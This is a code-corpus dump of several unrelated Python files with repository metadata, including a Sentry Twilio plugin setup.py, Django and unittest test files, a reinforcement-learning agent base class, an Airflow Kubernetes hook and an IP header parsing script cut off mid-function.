2017-02-01T16:49:25.000Z
|
2017-02-01T16:49:25.000Z
|
setup.py
|
originell/sentry-twilio
|
716c444649b38b68f9d6a02986de090bb7e580b9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
sentry-twilio
=============
Sentry Notification plugin for Twilio Programmable SMS.
:copyright: 2017 Luis Nell.
:license: MIT, see LICENSE for more details.
"""
from __future__ import absolute_import
from setuptools import setup, find_packages
VERSION = '1.0'
install_requires = [
'twilio==6.0.0rc10',
]
setup(
name='sentry-twilio',
version=VERSION,
author='Luis Nell',
author_email='luis.nell@simpleloop.com',
url='https://github.com/originell/sentry-twilio',
description='Sentry Notification plugin for Twilio Programmable SMS.',
long_description=__doc__,
license='MIT',
package_dir={'': 'src'},
packages=find_packages('src'),
zip_safe=False,
install_requires=install_requires,
include_package_data=True,
entry_points={
'sentry.apps': [
'twilio = sentry_twilio',
],
'sentry.plugins': [
'twilio = sentry_twilio.plugin:TwilioPlugin',
],
},
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: OS Independent',
'Topic :: Software Development'
],
)
| 24.04
| 74
| 0.645591
| 126
| 1,202
| 5.97619
| 0.579365
| 0.079681
| 0.047809
| 0.071713
| 0.12749
| 0.12749
| 0.12749
| 0
| 0
| 0
| 0
| 0.011727
| 0.219634
| 1,202
| 49
| 75
| 24.530612
| 0.791045
| 0.147255
| 0
| 0.085714
| 0
| 0
| 0.390364
| 0.056047
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.057143
| 0
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf8e32544c5c3cd5719527188568b3163339c08
| 3,146
|
py
|
Python
|
tests/test_refresh_subscription.py
|
Fak3/websubsub
|
f7ca8953197104483b152367c716028d841facbb
|
[
"MIT"
] | 4
|
2018-03-18T03:44:24.000Z
|
2019-08-10T00:40:54.000Z
|
tests/test_refresh_subscription.py
|
Fak3/websubsub
|
f7ca8953197104483b152367c716028d841facbb
|
[
"MIT"
] | 9
|
2020-02-12T13:38:38.000Z
|
2021-06-02T01:03:43.000Z
|
tests/test_refresh_subscription.py
|
Fak3/websubsub
|
f7ca8953197104483b152367c716028d841facbb
|
[
"MIT"
] | 2
|
2019-08-10T00:41:00.000Z
|
2020-02-09T10:09:59.000Z
|
import re
from datetime import timedelta
import responses
from django.test import override_settings
from django.utils.timezone import now
from model_mommy.mommy import make
from websubsub.models import Subscription
from websubsub.tasks import refresh_subscriptions, retry_failed
from .base import BaseTestCase, method_url_body
class RefreshSubscriptionsTest(BaseTestCase):
"""
When the refresh_subscriptions() task is called, only verified Subscriptions whose
lease_expiration_time is ending soon should be subscribed again.
"""
def test_refresh(self):
# GIVEN hub which returns HTTP_202_ACCEPTED
responses.add('POST', 'http://hub.io', status=202)
# AND verified Subscription with expiration time in 3 hours
torefresh = make(Subscription,
hub_url='http://hub.io',
topic='news-topic1',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(hours=3),
subscribe_status='verified'
)
# AND explicitly unsubscribed verified Subscription with
# expiration time in 3 hours
unsubscribed = make(Subscription,
hub_url='http://hub.io',
topic='news-topic2',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(hours=3),
subscribe_status='verified',
unsubscribe_status='verified'
)
# AND verified Subscription with expiration time in 3 days
fresh = make(Subscription,
hub_url='http://hub.io',
topic='news-topic3',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(days=3),
subscribe_status='verified'
)
# AND non-verified Subscription with expiration time in 3 hours
unverified = make(Subscription,
hub_url='http://hub.io',
topic='news-topic4',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(hours=3),
subscribe_status='requesting'
)
# WHEN refresh_subscriptions task is called
refresh_subscriptions.delay()
#retry_failed.delay()
# THEN no new Subscription should get created
assert len(Subscription.objects.all()) == 4
torefresh = Subscription.objects.get(id=torefresh.id)
# AND one POST request to hub should be sent
self.assertEqual([method_url_body(x) for x in responses.calls],
[
('POST', 'http://hub.io/', {
'hub.mode': ['subscribe'],
'hub.topic': [torefresh.topic],
'hub.callback': [torefresh.callback_url]
}),
]
)
# AND only this subscription_status should be changed from `verified` to `verifying`
assert dict(Subscription.objects.values_list('id', 'subscribe_status')) == {
torefresh.id: 'verifying', # changed
unsubscribed.id: 'verified',
fresh.id: 'verified',
unverified.id: 'requesting',
}
| 35.75
| 92
| 0.61602
| 328
| 3,146
| 5.780488
| 0.335366
| 0.066456
| 0.028481
| 0.07173
| 0.39557
| 0.379747
| 0.341772
| 0.341772
| 0.214662
| 0.130274
| 0
| 0.008509
| 0.29021
| 3,146
| 87
| 93
| 36.16092
| 0.840573
| 0.218055
| 0
| 0.220339
| 0
| 0
| 0.125154
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.016949
| false
| 0
| 0.152542
| 0
| 0.186441
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddfc5813cf287a659f99142896404836acf1a2ad
| 9,452
|
py
|
Python
|
src/agents/base.py
|
anindex/drqn-study
|
ab357178bbe6a1e09eda0f19583e8e8444bf4a54
|
[
"MIT"
] | null | null | null |
src/agents/base.py
|
anindex/drqn-study
|
ab357178bbe6a1e09eda0f19583e8e8444bf4a54
|
[
"MIT"
] | null | null | null |
src/agents/base.py
|
anindex/drqn-study
|
ab357178bbe6a1e09eda0f19583e8e8444bf4a54
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import random
from collections import deque
import torch
from os.path import exists
from torch.nn.functional import smooth_l1_loss, mse_loss # noqa
from torch.optim import Adam, Adagrad, RMSprop # noqa
from tensorboardX import SummaryWriter
def adjust_learning_rate(optimizer, lr):
for param_group in optimizer.param_groups:
param_group['lr'] = lr
class Agent(object):
def __init__(self, env_prototype, model_prototype, memory_prototype=None, **kwargs):
# env
self.env_prototype = env_prototype
self.env_params = kwargs.get('env')
self.env = self.env_prototype(**self.env_params)
self.state_shape = self.env.state_shape
self.action_dim = self.env.action_dim
# model
self.model_prototype = model_prototype
self.model_params = kwargs.get('model')
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model_params['use_cuda'] = torch.cuda.is_available()
self.model_params['stack_len'] = self.env_params['stack_len']
self.model_params['state_shape'] = (self.model_params['stack_len'] * self.state_shape[0], *self.state_shape[1:]) # state_shape in model: (stack_len * C, H, W)
self.model_params['action_dim'] = self.action_dim
self.model = None
# memory
self.memory_prototype = memory_prototype
self.memory_type = kwargs.get('memory_type', 'random')
self.memory_params = kwargs.get('memory')
self.memory = None
random.seed(self.env_params['seed'])
# logging
self.logger = kwargs.get('logger', logging.getLogger(__name__))
self.model_file = self.model_params.get('model_file', None)
self.log_folder = kwargs.get('log_folder', 'logs')
self.use_tensorboard = kwargs.get('use_tensorboard', True)
if self.use_tensorboard:
self.writer = SummaryWriter(self.log_folder)
self.log_step_interval = kwargs.get('log_step_interval', 100)
self.log_episode_interval = kwargs.get('log_episode_interval', 10)
self.train_visualize = kwargs.get('train_visualize', False)
self.save_best = kwargs.get('save_best', True)
if self.save_best:
self.best_step = None # NOTE: achieves best_reward at this step
self.best_reward = None # NOTE: only save a new model if achieves higher reward
self.retrain = kwargs.get('retrain', True)
self.solved_stop = kwargs.get('solved_stop', True)
self.log_window_size = kwargs.get('log_window_size', 100)
self._reset_training_loggings()
# agent_params
# criteria and optimizer
self.value_criteria = eval(kwargs.get('value_criteria', 'mse_loss'))
self.optimizer_class = eval(kwargs.get('optimizer', 'Adam'))
# hyperparameters
self.episodes = kwargs.get('episodes', 100000)
self.steps = kwargs.get('steps', 22000000)
self.random_eps = kwargs.get('random_eps', 50)
self.learn_start = kwargs.get('learn_start', 1000) # num steps to fill the memory
self.gamma = kwargs.get('gamma', 0.99)
self.clip_grad = kwargs.get('clip_grad', float('inf'))
self.lr = kwargs.get('lr', 0.0001)
self.lr_decay = kwargs.get('lr_decay', False)
self.weight_decay = kwargs.get('weight_decay', 0.)
self.eps_start = kwargs.get('eps_start', 1.0)
self.eps_decay = kwargs.get('eps_decay', 50000) # num of decaying steps
self.eps_end = kwargs.get('eps_end', 0.01)
self.prog_freq = kwargs.get('prog_freq', 2500)
self.train_interval = kwargs.get('train_interval', 1)
self.memory_interval = kwargs.get('memory_interval', 1)
self.action_repetition = kwargs.get('action_repetition', 1)
self.test_nepisodes = kwargs.get('test_nepisodes', 1)
self.target_model_update = kwargs.get('target_model_update', 1000) # update every # steps
self.batch_size = kwargs.get('batch_size', 32)
self.bootstrap_type = kwargs.get('bootstrap_type', 'double_q')
# count step & episode
self.step = 0
self.episode = 0
def _load_model(self):
if self.model_file is not None and exists(self.model_file):
self.model.load_state_dict(torch.load(self.model_file))
self.logger.info('Loaded Model: ' + self.model_file)
else:
self.logger.info('No pretrained Model. Will train from scratch.')
def _save_model(self, step, curr_reward):
if self.model is None:
return
if self.save_best:
if self.best_step is None:
self.best_step = step
self.best_reward = curr_reward
if curr_reward >= self.best_reward:
self.best_step = step
self.best_reward = curr_reward
torch.save(self.model.state_dict(), self.model_file)
self.logger.info('Saved model: %s at best steps: %d and best reward: %d '
% (self.model_file, self.best_step, self.best_reward))
else:
torch.save(self.model.state_dict(), self.model_file)
self.logger.info('Saved model: %s after %d steps: ' % (self.model_file, step))
def _visualize(self, visualize=True):
if visualize:
self.env.visual()
self.env.render()
def _reset_training_loggings(self):
self.window_scores = deque(maxlen=self.log_window_size)
self.window_max_abs_q = deque(maxlen=self.log_window_size)
self.max_abs_q_log = [0] # per step
self.loss_log = [0] # per step
self.total_avg_score_log = [0] # per eps
self.run_avg_score_log = [0] # per eps
self.step_log = [0]
self.eps_log = [0]
def _reset_experiences(self):
self.env.reset()
if self.memory is not None:
self.memory.reset()
def _init_model(self, training=False):
self.model = self.model_prototype(name='Current Model', **self.model_params).to(self.device)
if not self.retrain:
self._load_model() # load pretrained model if provided
self.model.train(mode=training)
if training:
# target_model
self.target_model = self.model_prototype(name='Target Model', **self.model_params).to(self.device)
self._update_target_model_hard()
self.target_model.eval()
# memory
if self.memory_prototype is not None:
self.memory = self.memory_prototype(**self.memory_params)
# experience & states
self._reset_experiences()
def _store_episode(self, episode):
if self.memory_type == 'episodic':
self.memory.add_episode(episode)
else:
            self.logger.warning('Only episodic memory can add episodes!')
def _store_experience(self, experience, error=0.):
# Store most recent experience in memory.
if self.step % self.memory_interval == 0:
if self.memory_type == 'episodic':
self.memory.add(experience)
elif self.memory_type == 'random':
self.memory.add(experience, error)
else:
raise ValueError('Memory type %s is unsupported!' % self.memory_type)
# Hard update every `target_model_update` steps.
def _update_target_model_hard(self):
self.target_model.load_state_dict(self.model.state_dict())
# Soft update with `(1 - target_model_update) * old + target_model_update * new`.
def _update_target_model_soft(self):
for target_param, local_param in zip(self.target_model.parameters(), self.model.parameters()):
target_param.data.copy_(self.target_model_update * local_param.data + (1.0 - self.target_model_update) * target_param.data)
def _epsilon_greedy(self, q_values):
self.eps = self.eps_end + max(0, (self.eps_start - self.eps_end) * (self.eps_decay - self.episode) / self.eps_decay)
# choose action
if np.random.uniform() < self.eps: # then we choose a random action
action = random.randrange(self.action_dim)
else: # then we choose the greedy action
if self.model_params['use_cuda']:
action = np.argmax(q_values.cpu().numpy())
else:
action = np.argmax(q_values.numpy())
return action
def _create_zero_lstm_hidden(self, batch_size=1):
return (torch.zeros(self.model.num_lstm_layer, batch_size, self.model.hidden_dim).type(self.dtype).to(self.device),
torch.zeros(self.model.num_lstm_layer, batch_size, self.model.hidden_dim).type(self.dtype).to(self.device))
def _get_loss(self, experiences):
raise NotImplementedError()
def _forward(self, states):
raise NotImplementedError()
def _backward(self, experience):
raise NotImplementedError()
def fit_model(self): # training
raise NotImplementedError()
def test_model(self): # testing pre-trained models
raise NotImplementedError()
def set_seed(self, seed=0):
random.seed(seed)
self.env.env.seed(seed)
@property
def dtype(self):
return self.model.dtype
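# Illustrative subclass sketch (not part of the original file): concrete agents
# are expected to fill in the abstract hooks, e.g.
#
# class DQNAgent(Agent):
#     def _forward(self, states): ...        # pick an action from q_values
#     def _backward(self, experience): ...   # store experience, run a train step
#     def _get_loss(self, experiences): ...  # e.g. double-Q bootstrap target
#     def fit_model(self): ...               # training loop
#     def test_model(self): ...              # evaluation loop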
| 44.375587
| 167
| 0.643779
| 1,232
| 9,452
| 4.702922
| 0.193994
| 0.05592
| 0.025889
| 0.017604
| 0.19106
| 0.121332
| 0.107352
| 0.077667
| 0.064895
| 0.051087
| 0
| 0.011247
| 0.247461
| 9,452
| 212
| 168
| 44.584906
| 0.803318
| 0.074587
| 0
| 0.12069
| 0
| 0
| 0.087111
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12069
| false
| 0
| 0.068966
| 0.011494
| 0.218391
| 0.005747
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddfd26bd635a43dc9642fa41b92d7f6a9fd3de78
| 1,449
|
py
|
Python
|
mongo_commander/widgets.py
|
thieman/mongo_commander
|
407cccb1abdf16b3eb07f813f5dd5d9152930f4d
|
[
"MIT"
] | 2
|
2015-02-22T04:52:22.000Z
|
2018-12-14T10:33:25.000Z
|
mongo_commander/widgets.py
|
thieman/mongo_commander
|
407cccb1abdf16b3eb07f813f5dd5d9152930f4d
|
[
"MIT"
] | null | null | null |
mongo_commander/widgets.py
|
thieman/mongo_commander
|
407cccb1abdf16b3eb07f813f5dd5d9152930f4d
|
[
"MIT"
] | null | null | null |
"""Widgets abstract out common View rendering patterns like displaying
a list of logging messages or a bar chart. They typically take the ClusterData
object, a window, and a list of keys they should care about from ClusterData.
They then draw directly onto the window."""
from functools import reduce  # reduce is no longer a builtin in Python 3
from operator import itemgetter
from .curses_util import movedown, movex
class Widget(object):
def __init__(self, data):
self.data = data
self.source_keys = []
def apply_to_window(self, window):
raise NotImplementedError()
class StreamWidget(Widget):
"""Display line-by-line text data from a stream."""
def _gather_data(self):
return reduce(list.__add__, map(lambda key: self.data.get(key, []), self.source_keys))
def apply_to_window(self, window):
data_for_render = self._gather_data()
if not data_for_render:
return
window.move(0, 0)
first_jump = len(data_for_render[0]['time'].strftime('%c')) + 3
second_jump = first_jump + max(map(len, map(itemgetter('node_name'), data_for_render))) + 3
for datum in sorted(data_for_render, key=itemgetter('time'))[-10:]:
window.addstr('{} - '.format(datum['time'].strftime('%c')))
movex(window, first_jump)
window.addstr('{} - '.format(datum['node_name']))
movex(window, second_jump)
window.addstr(str(datum['data']).strip())
movedown(window, x=0)
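# Illustrative usage sketch (not part of the original file); ClusterData is
# approximated here by a plain dict, and `window` would come from curses:
#
# from datetime import datetime
# widget = StreamWidget({'node1.log': [
#     {'time': datetime.now(), 'node_name': 'node1', 'data': 'replication ok'}]})
# widget.source_keys = ['node1.log']
# widget.apply_to_window(window)  # window = curses.initscr()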
| 39.162162
| 99
| 0.655625
| 195
| 1,449
| 4.687179
| 0.471795
| 0.038293
| 0.071116
| 0.037199
| 0.087527
| 0.087527
| 0.087527
| 0.087527
| 0.087527
| 0
| 0
| 0.007092
| 0.221532
| 1,449
| 36
| 100
| 40.25
| 0.803191
| 0.214631
| 0
| 0.08
| 0
| 0
| 0.042591
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.08
| 0.04
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddfe5b6a2bd63f44708eacd4d1f196837c88804e
| 958
|
py
|
Python
|
tests/feature_propagation_test.py
|
emalgorithm/feature-propagation
|
de9ec54d5c035abe8d52d6ac4079156cc537e489
|
[
"Apache-2.0"
] | 20
|
2022-03-09T00:06:23.000Z
|
2022-03-18T09:59:36.000Z
|
tests/feature_propagation_test.py
|
emalgorithm/feature-propagation
|
de9ec54d5c035abe8d52d6ac4079156cc537e489
|
[
"Apache-2.0"
] | 2
|
2022-03-14T22:00:58.000Z
|
2022-03-21T02:11:50.000Z
|
tests/feature_propagation_test.py
|
twitter-research/feature-propagation
|
af2733589eab4023fca67f7e71a3b46ddbbea8cd
|
[
"Apache-2.0"
] | 3
|
2022-03-09T05:36:53.000Z
|
2022-03-11T13:53:45.000Z
|
"""
Copyright 2020 Twitter, Inc.
SPDX-License-Identifier: Apache-2.0
"""
import unittest
import math
import torch
from feature_propagation import FeaturePropagation
class TestFeaturePropagation(unittest.TestCase):
def test_feature_propagation(self):
X = torch.Tensor([1 / 2, 0, 1 / 3, 0]).reshape(-1, 1)
node_mask = torch.BoolTensor([True, False, True, False])
edge_index = torch.LongTensor(
[[0, 2], [2, 0], [0, 3], [3, 0], [1, 2], [2, 1], [1, 3], [3, 1], [2, 3], [3, 2]]
).T
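        # Expected result of one propagation step with a symmetrically
        # normalized adjacency (edge weight 1/sqrt(deg_i * deg_j)); features
        # known under node_mask are reset to their original values.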
expected_X_propagated = torch.Tensor(
[[1 / 2], [(1 / math.sqrt(6)) * (1 / 3)], [1 / 3], [(1 / 3) * (1 / 3) + (1 / math.sqrt(6)) * (1 / 2)]]
)
fp = FeaturePropagation(num_iterations=1)
X_propagated = fp.propagate(x=X, edge_index=edge_index, mask=node_mask)
self.assertTrue(torch.allclose(expected_X_propagated, X_propagated))
if __name__ == "__main__":
unittest.main()
| 29.9375
| 114
| 0.59499
| 132
| 958
| 4.143939
| 0.386364
| 0.021938
| 0.021938
| 0.021938
| 0.053016
| 0.016453
| 0.016453
| 0
| 0
| 0
| 0
| 0.069293
| 0.231733
| 958
| 31
| 115
| 30.903226
| 0.673913
| 0.066806
| 0
| 0
| 0
| 0
| 0.009029
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 1
| 0.052632
| false
| 0
| 0.210526
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddff02eefab9048a47d0d1a8a7f90b6f135ea01d
| 2,427
|
py
|
Python
|
tests/test_file.py
|
gaiadhi/traDSSAT
|
1d5615dbd4965bab5c2740134c706c1748ff5fae
|
[
"MIT"
] | 6
|
2020-10-05T11:50:37.000Z
|
2022-02-24T08:36:22.000Z
|
tests/test_file.py
|
gaiadhi/traDSSAT
|
1d5615dbd4965bab5c2740134c706c1748ff5fae
|
[
"MIT"
] | 23
|
2018-11-08T19:16:36.000Z
|
2021-07-20T23:34:18.000Z
|
tests/test_file.py
|
gaiadhi/traDSSAT
|
1d5615dbd4965bab5c2740134c706c1748ff5fae
|
[
"MIT"
] | 9
|
2018-11-06T21:04:07.000Z
|
2021-06-19T05:43:24.000Z
|
import os
import unittest
import numpy.testing as npt
from tradssat import SoilFile, WTHFile, MTHFile, ExpFile, CULFile, ECOFile, DSSATResults
from tradssat.out import SoilTempOut, SoilNiOut, SummaryOut, PlantGroOut, ETOut, SoilWatOut, MulchOut
from tests.utils import _test_read, _test_write, rsrcs, read_json, get_ref_var
input_classes = [SoilFile, WTHFile, MTHFile, ExpFile, CULFile, ECOFile]
rsrcs_out = os.path.join(rsrcs, 'Out')
output_classes = [PlantGroOut, SoilNiOut, SoilTempOut, SoilWatOut, MulchOut, ETOut]
final_out_classes = [SummaryOut]
# Inputs must be read and written
class TestInputs(unittest.TestCase):
def test_read(self):
for inp_class in input_classes:
with self.subTest(inp_class.__name__):
_test_read(inp_class, folder=rsrcs, testcase=self)
def test_write(self):
for inp_class in input_classes:
with self.subTest(inp_class.__name__):
_test_write(inp_class, rsrcs, testcase=self)
# Outputs are only read, not written
class TestOutputs(unittest.TestCase):
def test_read(self):
for out_class in output_classes:
with self.subTest(out_class.__name__):
_test_read(out_class, folder=rsrcs_out, testcase=self)
class TestFinalOutputs(unittest.TestCase):
def test_read(self):
for final_out_class in final_out_classes:
with self.subTest(final_out_class.__name__):
_test_read(final_out_class, folder=rsrcs_out, testcase=self)
class TestOutHeader(unittest.TestCase):
def setUp(self):
self.path = f'{rsrcs_out}/Cassava/headerTest'
self.ref = read_json(f'{self.path}/_ref_PlantGro.OUT.json')
self.instance = DSSATResults(self.path)
def test_entire_array(self):
actual = self.instance.get_value("HWAD", trt=1, run=2)
expected = get_ref_var(self.ref, "HWAD", trt=1, run=2)
npt.assert_equal(actual, expected)
def test_time_specific(self):
actual = self.instance.get_value("TWAD", trt=2, run=4, t=194, at='DAP')
expected = 9394
npt.assert_equal(actual, expected)
def test_wrong_values(self):
"""
Header var 'run' is unique for each simulation.
For the current ref file the correct input is: 'trt = 2' and 'run = 4'
"""
with npt.assert_raises(StopIteration):
self.instance.get_value("LAID", trt=2, run=2)
| 35.173913
| 101
| 0.689328
| 324
| 2,427
| 4.916667
| 0.324074
| 0.035154
| 0.047709
| 0.055242
| 0.359699
| 0.319523
| 0.227872
| 0.124294
| 0.07533
| 0.07533
| 0
| 0.008891
| 0.212196
| 2,427
| 68
| 102
| 35.691176
| 0.824268
| 0.076638
| 0
| 0.2
| 0
| 0
| 0.038949
| 0.028986
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0.177778
| false
| 0
| 0.133333
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb00206f76f0396ffc60257de95610a6a4ddebea
| 2,840
|
py
|
Python
|
airflow_spark_k8s/hooks/kubernetes.py
|
roitvt/airflow-spark-k8s
|
cd2a0ec63e1fb9ad43beb725a65e4d65a4d85206
|
[
"Apache-2.0"
] | 2
|
2020-04-26T11:12:11.000Z
|
2020-09-14T16:36:42.000Z
|
airflow_spark_k8s/hooks/kubernetes.py
|
roitvt/airflow-spark-k8s
|
cd2a0ec63e1fb9ad43beb725a65e4d65a4d85206
|
[
"Apache-2.0"
] | 1
|
2020-04-14T18:20:20.000Z
|
2020-04-14T18:26:27.000Z
|
airflow_spark_k8s/hooks/kubernetes.py
|
roitvt/airflow-spark-k8s
|
cd2a0ec63e1fb9ad43beb725a65e4d65a4d85206
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tempfile
from kubernetes import client, config
from airflow.hooks.base_hook import BaseHook
class KubernetesHook(BaseHook):
"""
Creates Kubernetes API connection.
:param conn_id: the connection to Kubernetes cluster
"""
def __init__(
self,
conn_id="kubernetes_default"
):
self.connection = self.get_connection(conn_id)
self.extras = self.connection.extra_dejson
def get_conn(self):
"""
Returns kubernetes api session for use with requests
"""
        if self._get_field("in_cluster"):
self.log.debug("loading kube_config from: in_cluster configuration")
config.load_incluster_config()
elif self._get_field("kube_config") is None or self._get_field("kube_config") == '':
self.log.debug("loading kube_config from: default file")
config.load_kube_config()
else:
with tempfile.NamedTemporaryFile() as temp_config:
self.log.debug("loading kube_config from: connection kube_config")
temp_config.write(self._get_field("kube_config").encode())
temp_config.flush()
config.load_kube_config(temp_config.name)
temp_config.close()
return client.ApiClient()
def get_namespace(self):
"""
        Returns the namespace that is defined in the connection
"""
return self._get_field("namespace", default="default")
def _get_field(self, field_name, default=None):
"""
        Fetches a field from extras, and returns it. This is some Airflow
        magic. The kubernetes hook type adds custom UI elements
        to the hook page, which allow admins to specify in_cluster configuration, kube_config, namespace etc.
        They get formatted as shown below.
"""
full_field_name = 'extra__kubernetes__{}'.format(field_name)
if full_field_name in self.extras:
return self.extras[full_field_name]
else:
return default
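# Illustrative sketch (not part of the original file): for a connection whose
# Extra JSON is {"extra__kubernetes__namespace": "jobs"},
# KubernetesHook(conn_id="kubernetes_default").get_namespace() returns "jobs".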
| 37.866667
| 109
| 0.679225
| 364
| 2,840
| 5.137363
| 0.409341
| 0.053476
| 0.032086
| 0.030481
| 0.091444
| 0.059358
| 0.059358
| 0.041711
| 0
| 0
| 0
| 0.001866
| 0.24507
| 2,840
| 74
| 110
| 38.378378
| 0.870336
| 0.425
| 0
| 0.060606
| 0
| 0
| 0.155482
| 0.013953
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.090909
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb00a41d3f7f3756cedf6911bccc4f0b80b7ea08
| 325
|
py
|
Python
|
tests/test_main.py
|
david-kirby/gh-action-docs
|
b231d14b0b629b4f308eba6cff50a35a98c9f521
|
[
"MIT"
] | 1
|
2021-03-21T14:31:46.000Z
|
2021-03-21T14:31:46.000Z
|
tests/test_main.py
|
david-kirby/gh-action-docs
|
b231d14b0b629b4f308eba6cff50a35a98c9f521
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
david-kirby/gh-action-docs
|
b231d14b0b629b4f308eba6cff50a35a98c9f521
|
[
"MIT"
] | null | null | null |
import logging
import unittest
from src.gh_action_docs import app
logging.disable(logging.CRITICAL)
class TestActionFileCheck(unittest.TestCase):
def test_no_files_found(self):
results = app.check_for_file("not-existent-file")
self.assertFalse(results)
if __name__ == "__main__":
unittest.main()
| 20.3125
| 57
| 0.747692
| 41
| 325
| 5.560976
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156923
| 325
| 15
| 58
| 21.666667
| 0.832117
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.3
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0391e58115974e49fe694882ae6ffe7af0d172
| 2,330
|
py
|
Python
|
5.4/IPheaderChecksum.py
|
Fecer/Computer-Networks
|
fe4fc5bd1af7f2957aee407675cb018fa83c6735
|
[
"MIT"
] | null | null | null |
5.4/IPheaderChecksum.py
|
Fecer/Computer-Networks
|
fe4fc5bd1af7f2957aee407675cb018fa83c6735
|
[
"MIT"
] | null | null | null |
5.4/IPheaderChecksum.py
|
Fecer/Computer-Networks
|
fe4fc5bd1af7f2957aee407675cb018fa83c6735
|
[
"MIT"
] | null | null | null |
from xml.dom.minidom import parse
def printLine():
print('------------------------------------------')
if __name__ == '__main__':
    # Load parameters from config.xml
DOMTree = parse("config.xml")
collection = DOMTree.documentElement
header = collection.getElementsByTagName('header')[0].childNodes[0].data
printLine()
print('Header:\n', header)
printLine()
version = header[:1]
print('Version:\n', version)
printLine()
headerLen = header[1:2]
print('Header Length:\n', headerLen)
printLine()
service = header[2:4]
print('Differentiated Services Field:\n', service)
printLine()
totalLen = header[4:8]
totalLen = int(totalLen, 16)
print('Total Length:\n', totalLen)
printLine()
id = header[8:12]
id = int(id, 16)
print('Identification:\n', id)
printLine()
flags = header[12:16]
flags = int(flags, 16)
print('Flags and Offset:\n', flags)
printLine()
ttl = header[16:18]
ttl = int(ttl, 16)
print('Time to live:\n', ttl)
printLine()
protocol = header[18:20]
protocol = int(protocol, 16)
print('Protocol:\n', protocol)
printLine()
checksum = header[20:24]
checksum = int(checksum, 16)
print('Checksum in header:\n', checksum, '(' + header[20:24] + ')')
printLine()
source = header[24:32]
a = str(int(source[0:2], 16))
b = str(int(source[2:4], 16))
c = str(int(source[4:6], 16))
d = str(int(source[6:8], 16))
print('Source IP:\n', a+'.'+b+'.'+c+'.'+d)
printLine()
dest = header[32:40]
a = str(int(dest[0:2], 16))
